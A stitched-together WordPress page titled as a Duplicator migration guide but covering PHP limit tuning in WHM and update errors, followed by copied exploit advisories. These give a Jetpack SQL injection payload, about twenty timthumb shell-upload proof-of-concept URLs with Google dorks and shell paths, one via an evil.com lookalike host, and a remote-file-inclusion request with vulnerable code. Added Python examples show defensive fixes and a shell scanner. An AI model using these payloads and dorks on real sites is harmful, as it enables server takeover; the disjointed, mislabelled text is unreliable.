How to Migrate Your WordPress Site with the Duplicator Plugin
Credits: CanalWP
If you want to change the domain, or you want to make a backup and install it on a local WordPress server, you will need to change the blog's address.
Besides copying all the files, some information in the database must be updated to switch domains. The quickest way to do this is by editing the database directly; the step-by-step guide below shows how to do it in a practical, fast and completely safe way.
Even if you are not an expert on the subject, you have probably heard of WordPress. It is today the world's most popular platform for building and developing websites, from blogs and corporate sites to complex systems and online stores.
Well, first of all, it is necessary to distinguish WordPress.com, an online platform where you can set up a blog for free (like Blogger or Tumblr), from WordPress.org. From the latter site you can download a ZIP file containing the WordPress system installation; this is what your site is built on.
The webmaster installs this WordPress.org package on their web hosting service and, from there, can create a database for the website and start building it, adding or modifying features and changing the so-called theme, which is the "look" the website will have.
Steps to Fix the Problem:
1 – Log in to WHM as root,
2 – Follow the menus and submenus (->) Home -> Service Configuration -> PHP Configuration Editor,
3 – Locate the memory_limit item; it must be AT LEAST 320 MB (yes, there are heavy plugins that consume a lot of RAM),
4 – Locate upload_max_filesize; although it does not affect this issue, it can bite you at upload time, so leave it at at least 500 MB (our hosting allows 2 GB uploads),
5 – Locate max_execution_time and leave it at at least 600 s (for long uploads or plugin processes a long execution time is essential),
6 – Locate max_input_time and leave it at at least 300 s.
Of all the points we listed, the two main ones for fixing the problem are memory_limit and max_execution_time.
Source: http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/
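The four directives from the steps above can be checked mechanically before anyone touches WHM. The script below is an added example, not part of the original post and not a cPanel/WHM tool: it reads php.ini-style text (a constructed sample is embedded), converts PHP shorthand sizes such as 320M and 2G to bytes, treats 0 and -1 as "no limit", handles the max_input_time = -1 case (which means "use max_execution_time", not unlimited), and reports every directive that is missing or below the minimums the post recommends. The thresholds are the post's numbers; the sample php.ini is made up.

```python
import re

# Minimums recommended by the steps above (the post's numbers, not PHP defaults).
RECOMMENDED_MINIMUMS = {
    "memory_limit": "320M",
    "upload_max_filesize": "500M",
    "max_execution_time": "600",
    "max_input_time": "300",
}
SIZE_KEYS = {"memory_limit", "upload_max_filesize"}
_MULTIPLIER = {"": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}


def parse_php_size(value):
    """Convert PHP shorthand byte notation ('320M', '2g', '65536') to bytes.
    -1 means unlimited in PHP and is returned as None."""
    v = value.strip().lower()
    if v == "-1":
        return None
    match = re.fullmatch(r"(\d+)\s*([kmg]?)", v)
    if not match:
        raise ValueError(f"unrecognised PHP size value: {value!r}")
    return int(match.group(1)) * _MULTIPLIER[match.group(2)]


def parse_php_time(value):
    """Seconds as an int; 0 (or a negative value) means no limit and is returned as None."""
    seconds = int(value.strip())
    return None if seconds <= 0 else seconds


def parse_ini(text):
    """Minimal php.ini reader: 'key = value' lines, ';' comments, [sections] skipped."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, val = line.partition("=")
        settings[key.strip().lower()] = val.strip().strip('"')
    return settings


def find_undersized(ini_text, minimums=RECOMMENDED_MINIMUMS):
    """Return (directive, current value, recommended minimum) for each directive that is
    missing or below the recommended minimum. Unlimited values are never reported."""
    settings = parse_ini(ini_text)
    problems = []
    for key, minimum in minimums.items():
        raw = settings.get(key)
        if raw is None:
            problems.append((key, "not set", minimum))
            continue
        if key in SIZE_KEYS:
            have, need = parse_php_size(raw), parse_php_size(minimum)
        else:
            # Edge case: max_input_time = -1 means "use max_execution_time", not unlimited.
            if key == "max_input_time" and raw.strip() == "-1":
                have = parse_php_time(settings.get("max_execution_time", "0"))
            else:
                have = parse_php_time(raw)
            need = parse_php_time(minimum)
        if have is not None and have < need:
            problems.append((key, raw, minimum))
    return problems


# Constructed sample; not a real server's php.ini.
SAMPLE_PHP_INI = """\
[PHP]
memory_limit = 128M
upload_max_filesize = 2G
max_execution_time = 30   ; PHP's default
max_input_time = -1
"""

if __name__ == "__main__":
    for key, current, required in find_undersized(SAMPLE_PHP_INI):
        print(f"{key} = {current}: raise to at least {required}")
```

Run it against the output of `php --ini` (the loaded file) or a copy of the WHM-managed php.ini; anything it prints is a directive to raise in the PHP Configuration Editor.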
If you get the message -> An unexpected error occurred (unexpected error) <- when trying to do ANYTHING remote from WordPress (install a version, update a plugin, install a plugin, view Akismet, etc.), don't worry, the way out is simple and clear:
1 – Check that outgoing port 80 is open on your firewall (it is a good idea to open 443 for SSL as well),
2 – Check that the WordPress folders have the correct permissions (755 under suEXEC or 777 under DSO without suEXEC), and that the PHP files have the correct permissions -> 644.
3 – If the two points above are OK, have the server admin run a test: in the file /etc/resolv.conf, add at the beginning of the file:
nameserver 8.8.8.8
nameserver 8.8.4.4
These two nameservers resolve publicly using Google's "modest" infrastructure.
Recently, a way to reduce the frequency of attacks on sites that use Content Management Systems (better known as CMS) was published on Icentral. The tip is simple and easy to understand, and we strongly recommend reading it. To access the content, click the link below:
######################################################
# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: WordPress
# Download: http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
*DESCRIPTION
Discovered a vulnerability in jetpack, WordPress Plugin,
vulnerability is SQL injection.
File: wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
*Exploitation*
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][MID((VERSION()),1,6)
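The advisory above reports an injectable id parameter but shows no code. The following is an added Python illustration of that defect class and its fix; it is not Jetpack's code, and the shares table is constructed for the example. The vulnerable function pastes the request value into the SQL text, so an id of `-1 OR 1=1` turns a single-row lookup into a full table dump; the hardened form validates the id as an integer and binds it as a query parameter, so the same value selects nothing.

```python
import sqlite3


def build_demo_db():
    """In-memory stand-in for a plugin table keyed by a numeric id (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shares (id INTEGER PRIMARY KEY, service TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO shares VALUES (?, ?, ?)",
        [(1, "twitter", "alice"), (2, "facebook", "bob"), (3, "email", "carol")],
    )
    return conn


def lookup_share_vulnerable(conn, user_supplied_id):
    """The defect class the advisory reports: the request's id value is pasted into SQL,
    so a value such as '-1 OR 1=1' rewrites the query instead of selecting a row."""
    sql = f"SELECT id, service, owner FROM shares WHERE id = {user_supplied_id}"
    return conn.execute(sql).fetchall()


def lookup_share_safe(conn, user_supplied_id):
    """Hardened form: validate the id as an integer and bind it as a query parameter."""
    try:
        share_id = int(str(user_supplied_id).strip())
    except ValueError:
        return []  # not a valid id: no row and no query
    return conn.execute(
        "SELECT id, service, owner FROM shares WHERE id = ?", (share_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = build_demo_db()
    tampered = "-1 OR 1=1"  # the advisory's id=-1 form, extended with a tautology
    print("vulnerable:", lookup_share_vulnerable(conn, tampered))  # every row
    print("safe:      ", lookup_share_safe(conn, tampered))        # []
```

The integer cast is the part that matters for a numeric id: once the value is an int, the parameter binding guarantees it can only ever be compared, never parsed as SQL.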
# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following WordPress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
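The blogger.com.evil.com host in the description passes because the allowed-domain check matches the beginning of the host name rather than the whole host. The Python below is an added example, not timthumb's code or any plugin's: is_allowed_weak reproduces that prefix match, while is_allowed_strict parses the URL first, restricts the scheme to http(s), and accepts only an exact allowed host or a subdomain of one, which also rejects user-info tricks such as http://blogger.com@evil.com/. The allowlist is a constructed sample.

```python
from urllib.parse import urlsplit

# Constructed allowlist for the example; a real deployment keeps its own list.
ALLOWED_SITES = ["blogger.com", "wordpress.com", "flickr.com"]


def is_allowed_weak(url, allowed=ALLOWED_SITES):
    """Prefix match on the host name: the pattern that blogger.com.evil.com slips through."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host.startswith(site) for site in allowed)


def is_allowed_strict(url, allowed=ALLOWED_SITES):
    """Accept only http(s) URLs whose parsed host is an allowed domain or a subdomain of it.
    Matching on the parsed host (not the raw string) defeats user-info and path tricks."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")  # ignore a trailing root dot
    if not host:
        return False
    return any(host == site or host.endswith("." + site) for site in allowed)


if __name__ == "__main__":
    probe = "http://blogger.com.evil.com/poc.php"  # host from the advisory text
    print("weak  :", is_allowed_weak(probe))        # True
    print("strict:", is_allowed_strict(probe))      # False
```

Host matching only decides where the fetch may go; the fetched body still needs to be treated as untrusted bytes (re-encoded as an image, never written under a name the web server will execute), which is the second half of the problem the advisories above describe.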
# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/external_md5(src).php
# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php
# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php
# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php
# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php
# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL
Must first base64 encode the URL.
The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php
# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php
# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php
# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php
# Plugin: Islidex WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php
# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php
# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php
# Plugin: A Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php
# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php
# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php
# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php
# Plugin: User Avatar WordPress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php
Requires register_globals to be enabled and at least one user account to have an avatar directory.
The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php
# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
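Each advisory above names the cache directory and the md5(src).php naming under which a fetched file lands, which gives a defender a concrete filesystem artifact to hunt for after patching. The scanner below is an added example, not part of any advisory or plugin: it walks a directory tree and flags PHP files inside cache/temp directories, file names matching the external_md5(src).php pattern, and any file that begins with a GIF header yet contains a PHP open tag (the image/PHP polyglot the description mentions). build_sample_tree writes a constructed fixture, one legitimate script, one ordinary cached image and one polyglot, so the example runs offline; the plugin name and hashes in it are made up for the demo.

```python
import hashlib
import os
import re
import tempfile

# Directory names the advisories above list as the drop location for fetched "images".
CACHE_DIR_NAMES = {"cache", "temp"}
# md5(src).php / external_md5(src).php naming from the advisories.
CACHE_PHP_NAME = re.compile(r"^(external_)?[0-9a-f]{32}\.php$", re.IGNORECASE)
GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def classify_file(path):
    """Return the reasons a file looks like a dropped shell; an empty list means clean."""
    reasons = []
    name = os.path.basename(path)
    parent = os.path.basename(os.path.dirname(path)).lower()
    if parent in CACHE_DIR_NAMES and name.lower().endswith(".php"):
        reasons.append("PHP file inside an image cache directory")
    if CACHE_PHP_NAME.match(name):
        reasons.append("file name matches the md5(src).php cache naming")
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(GIF_MAGIC) and PHP_OPEN_TAG.search(data):
        reasons.append("GIF header followed by a PHP open tag (image/PHP polyglot)")
    return reasons


def scan_tree(root):
    """Walk root and return sorted (relative path, reasons) pairs for suspicious files."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            full = os.path.join(dirpath, filename)
            reasons = classify_file(full)
            if reasons:
                findings.append((os.path.relpath(full, root), reasons))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed fixture: one plugin directory after a successful fetch (not real data)."""
    plugin = os.path.join(root, "wp-content", "plugins", "a-gallery")
    cache = os.path.join(plugin, "cache")
    os.makedirs(cache)
    with open(os.path.join(plugin, "timthumb.php"), "wb") as fh:
        fh.write(b"<?php // stands in for the plugin's own script\n")
    src = b"http://blogger.com.evil.com/poc.php"  # host trick from the advisory text
    dropped = os.path.join(cache, "external_%s.php" % hashlib.md5(src).hexdigest())
    with open(dropped, "wb") as fh:
        fh.write(b"GIF89a" + b"\x00" * 16 + b"<?php /* attacker code would follow */ ?>")
    with open(os.path.join(cache, "external_" + "0" * 32 + ".txt"), "wb") as fh:
        fh.write(b"GIF89a" + b"\x00" * 32)  # an ordinary cached image
    return root


def run_demo():
    """Build the fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, reasons in run_demo():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Pointed at a real document root (`scan_tree("/var/www/html")`), the polyglot check is the one that survives renaming: a GIF header followed by `<?php` has no legitimate reason to exist anywhere under wp-content.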
# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter